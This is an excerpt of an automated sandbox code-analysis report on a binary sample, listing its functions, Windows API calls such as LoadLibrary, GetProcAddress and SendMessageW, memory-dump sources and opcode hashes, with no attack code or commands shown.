                                                                        • Instruction Fuzzy Hash: D221C532610118BFDB118F54CC85EBF3BAAEF89764F019129F944AB2A1C6719C12D7A0
                                                                        Function 00EDA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EDA46D
                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EDA482
                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EDA48F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: msctls_trackbar32
                                                                        • API String ID: 3850602802-1010561917
                                                                        • Opcode ID: 293dc73121d9c796e430ecf0f00b7f229b6b5b3868364ec7aac4825eb30b3183
                                                                        • Instruction ID: b75c8087939ff2a957b09a25e6808009361d369a66acabf9f20b001e74cd1bec
                                                                        • Opcode Fuzzy Hash: 293dc73121d9c796e430ecf0f00b7f229b6b5b3868364ec7aac4825eb30b3183
                                                                        • Instruction Fuzzy Hash: 9C11EB71100208BEDF205F65CC49FAB3769EF88768F054129FA55A61D1D6B1E812DB10
                                                                        Function 00E92287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E92350,?), ref: 00E922A1
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00E922A8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RoInitialize$combase.dll
                                                                        • API String ID: 2574300362-340411864
                                                                        • Opcode ID: a04202f9c6b718e1155f994e5f39968e45ad6265bc74c04303fcfb240ed32d84
                                                                        • Instruction ID: 40b2dbe4b5db003069e11a6388030055382bb90f7531c902be48279d77a73e8d
                                                                        • Opcode Fuzzy Hash: a04202f9c6b718e1155f994e5f39968e45ad6265bc74c04303fcfb240ed32d84
                                                                        • Instruction Fuzzy Hash: 17E01A70698308ABDF20AF71EC49B243A6AA741716F1050A5B202E50B0DFB54055EF08
                                                                        Function 00E9235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E92276), ref: 00E92376
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00E9237D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RoUninitialize$combase.dll
                                                                        • API String ID: 2574300362-2819208100
                                                                        • Opcode ID: 893728ee2868be635f8684c50b6633dabb8d7e059b895415dea03467dcbc6b9c
                                                                        • Instruction ID: 66b8a65b111f4dd1ffef785720d396bb51a180875bf35d555aa77dd4103f3251
                                                                        • Opcode Fuzzy Hash: 893728ee2868be635f8684c50b6633dabb8d7e059b895415dea03467dcbc6b9c
                                                                        • Instruction Fuzzy Hash: 7CE0BD70689309AFEB20AF61ED1DB243A76B740716F101429F209F20B0CBB89424FA15
                                                                        Function 00EEAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: LocalTime__swprintf
                                                                        • String ID: %.3d$WIN_XPe
                                                                        • API String ID: 2070861257-2409531811
                                                                        • Opcode ID: 9cffc0ce124c586ed90929a52ba485ddc70b2f8727e351e52e41d830db82bcac
                                                                        • Instruction ID: 8017ac217e03d9c57757df78eab8572d070a734cf06bb296b7e5c402637bcfe1
                                                                        • Opcode Fuzzy Hash: 9cffc0ce124c586ed90929a52ba485ddc70b2f8727e351e52e41d830db82bcac
                                                                        • Instruction Fuzzy Hash: 9EE0EC7180865DDBCA1197929D059F9B3BCAB04741F2824E6B90AB1050E675AB84AB13
                                                                        Function 00E742F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00E742EC,?,00E742AA,?), ref: 00E74304
                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E74316
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                        • API String ID: 2574300362-1355242751
                                                                        • Opcode ID: 3fc43c0eeb502421b28e4566979a87bc0a61f2db267814609b26a891e1248266
                                                                        • Instruction ID: 83b3a904fe61b24788e9c2c5ea6fadf3671342bbd28087148dad361c0c681c08
                                                                        • Opcode Fuzzy Hash: 3fc43c0eeb502421b28e4566979a87bc0a61f2db267814609b26a891e1248266
                                                                        • Instruction Fuzzy Hash: 79D0A7F0404F22FFD7204F21FC0C6117AD5AF04305B008419E549F21A0E7B0C884D611
                                                                        Function 00ED2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00ED21FB,?,00ED23EF), ref: 00ED2213
                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00ED2225
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetProcessId$kernel32.dll
                                                                        • API String ID: 2574300362-399901964
                                                                        • Opcode ID: ea7318cf91c0fbc923e2bab25656b86e3e7311eddcdd569c0dd93a4dd8850403
                                                                        • Instruction ID: c214febd20171bb97e8ab597e2e83fea8cb74c9ca9c1062e69297d26f3d746bb
                                                                        • Opcode Fuzzy Hash: ea7318cf91c0fbc923e2bab25656b86e3e7311eddcdd569c0dd93a4dd8850403
                                                                        • Instruction Fuzzy Hash: EBD0A7344047229FC7214F31FD086117AD5EF14314B00541EF895F2260E7B0D884EA51
                                                                        Function 00E7434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00E741BB,00E74341,?,00E7422F,?,00E741BB,?,?,?,?,00E739FE,?,00000001), ref: 00E74359
                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E7436B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                        • API String ID: 2574300362-3689287502
                                                                        • Opcode ID: d7e9a73e2b31b4192958eed313fa93fdaf2ce9c346c686a637bb7b0956b4df2a
                                                                        • Instruction ID: 707568a11e9b50dbb7bb14c16f12f3eff9c94d257574540f602344ff71a95cb9
                                                                        • Opcode Fuzzy Hash: d7e9a73e2b31b4192958eed313fa93fdaf2ce9c346c686a637bb7b0956b4df2a
                                                                        • Instruction Fuzzy Hash: 15D0A7B0444722BFD7214F31FC486117AD5AF10719B018519E489F2190E7B0D984D611
                                                                        Function 00EB0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00EB052F,?,00EB06D7), ref: 00EB0572
                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00EB0584
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                        • API String ID: 2574300362-1587604923
                                                                        • Opcode ID: 80bdd255dd6835e32521044d63d7f3564537983e7f5a8632d2c4bc67c97135a7
                                                                        • Instruction ID: fe54cd8182e9aa5b352af7ba25af3185a74290040ef925fa4bf4713122198fc3
                                                                        • Opcode Fuzzy Hash: 80bdd255dd6835e32521044d63d7f3564537983e7f5a8632d2c4bc67c97135a7
                                                                        • Instruction Fuzzy Hash: 8ED05E70505322AED7309F21BC08A577BE4AB04304B108419E841A2550E670D484CA21
                                                                        Function 00EB0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,00EB051D,?,00EB05FE), ref: 00EB0547
                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00EB0559
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                        • API String ID: 2574300362-1071820185
                                                                        • Opcode ID: c4e49b2093c361547999ab8b84afcf610951cc78f4a64b7ad913c66ea9a60eb5
                                                                        • Instruction ID: 24e7efd455d2dcac420df5313029486b4bd3a219b86f71cbb7fc43c1d4e97d93
                                                                        • Opcode Fuzzy Hash: c4e49b2093c361547999ab8b84afcf610951cc78f4a64b7ad913c66ea9a60eb5
                                                                        • Instruction Fuzzy Hash: 8ED0A730505722AFC7308F61FC086577AE4AB04305B10C41DE446F2550E670D884CA11
                                                                        Function 00ECECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00ECECBE,?,00ECEBBB), ref: 00ECECD6
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00ECECE8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                        • API String ID: 2574300362-1816364905
                                                                        • Opcode ID: 2d98311fd43d6d44645e304030dfafbe7d69143a2a1b6d059a3672e08c9040b6
                                                                        • Instruction ID: 80f06df1429bc66c63fe410354bf94dab421fb0270da469e5b2389b7e824a5ec
                                                                        • Opcode Fuzzy Hash: 2d98311fd43d6d44645e304030dfafbe7d69143a2a1b6d059a3672e08c9040b6
                                                                        • Instruction Fuzzy Hash: 0AD0A731404733AFCB245F61FD48F12BAE4AF00304B00841DFC45F2250EBB0D884E611
                                                                        Function 00ECBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00ECBAD3,00000001,00ECB6EE,?,00F0DC00), ref: 00ECBAEB
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00ECBAFD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                        • API String ID: 2574300362-199464113
                                                                        • Opcode ID: a413020f2030ee7017290c49e520ddee67ab36a8d8b612d0dd4f88953df38c7a
                                                                        • Instruction ID: 23faee88bb93180f3067b0944262455487673b4f58ab3aa05a0bfffa31d5d850
                                                                        • Opcode Fuzzy Hash: a413020f2030ee7017290c49e520ddee67ab36a8d8b612d0dd4f88953df38c7a
                                                                        • Instruction Fuzzy Hash: 61D05E70C047239EC7305F21BC49F217AD4AB00304F00441DA853A2150E7B0D884DA11
                                                                        Function 00ED3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00ED3BD1,?,00ED3E06), ref: 00ED3BE9
                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00ED3BFB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                        • API String ID: 2574300362-4033151799
                                                                        • Opcode ID: f29763556825f36f3d60ea1cedfd9d69dfacebbcc454bd01735508f9129e8dbc
                                                                        • Instruction ID: daf33561c14009b56304a5bc8f1e556e150e56e5574c8619290e993bf7a59f6a
                                                                        • Opcode Fuzzy Hash: f29763556825f36f3d60ea1cedfd9d69dfacebbcc454bd01735508f9129e8dbc
                                                                        • Instruction Fuzzy Hash: 5AD0A770414722DFC7205F71FC08613FEF5EB01318B10442AE445F2250E6F0D484CE22
                                                                        Function 00EA9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5f930c22cb66fd90d984ca2b6eb01136a234d1d76ed6b6f47df8dd571ea3472f
                                                                        • Instruction ID: 1f333ae3f8c06d239a550810f696fc455e84a4e5aecdc3a3cd901a7b11196d6a
                                                                        • Opcode Fuzzy Hash: 5f930c22cb66fd90d984ca2b6eb01136a234d1d76ed6b6f47df8dd571ea3472f
                                                                        • Instruction Fuzzy Hash: 96C14E75A0021AEFCB14DF94C884AAEB7B5FF89714F109598E905EF252D730EE81DB90
                                                                        Function 00ECAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 00ECAAB4
                                                                        • CoUninitialize.OLE32 ref: 00ECAABF
                                                                          • Part of subcall function 00EB0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00EB027B
                                                                        • VariantInit.OLEAUT32(?), ref: 00ECAACA
                                                                        • VariantClear.OLEAUT32(?), ref: 00ECAD9D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                        • String ID:
                                                                        • API String ID: 780911581-0
                                                                        • Opcode ID: b402246a1a3577ca7f5d4209300a3473231f0356b5938885736a7fdcbd464922
                                                                        • Instruction ID: 513e34f768655a14a056dc2e479eb3cbd500ae23e50ab1fc85ed41f6dede7b9f
                                                                        • Opcode Fuzzy Hash: b402246a1a3577ca7f5d4209300a3473231f0356b5938885736a7fdcbd464922
                                                                        • Instruction Fuzzy Hash: 4DA125352046059FCB10EF14C581B5AB7E5BF88318F18945DFA9AAB3A2CB31ED45CB86
                                                                        Function 00EA91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                        • String ID:
                                                                        • API String ID: 2808897238-0
                                                                        • Opcode ID: 314a817768d05aabfab4ded614fabb08134561b943042a61c4a3095816f1f8c9
                                                                        • Instruction ID: 129b27818ab0d8b9c2e95b9e322f9003263f8fcc708311a5493dc04883f3b025
                                                                        • Opcode Fuzzy Hash: 314a817768d05aabfab4ded614fabb08134561b943042a61c4a3095816f1f8c9
                                                                        • Instruction Fuzzy Hash: 795192306043069BDF24AF66989166EB7F5AF4E314F20A81FE55AFF2D3DB70A8448711
                                                                        Function 00E9365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 3877424927-0
                                                                        • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                        • Instruction ID: ce6cc9b3316a55e5fd33d02074cfc6a6cad69ca8637e6e1b686365d9b7782126
                                                                        • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                        • Instruction Fuzzy Hash: 8551A1B1A00305ABDF28DFB988846AF77A1AF40324F24972AF825B62D1D7709F508B41
                                                                        Function 00EDC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        APIs
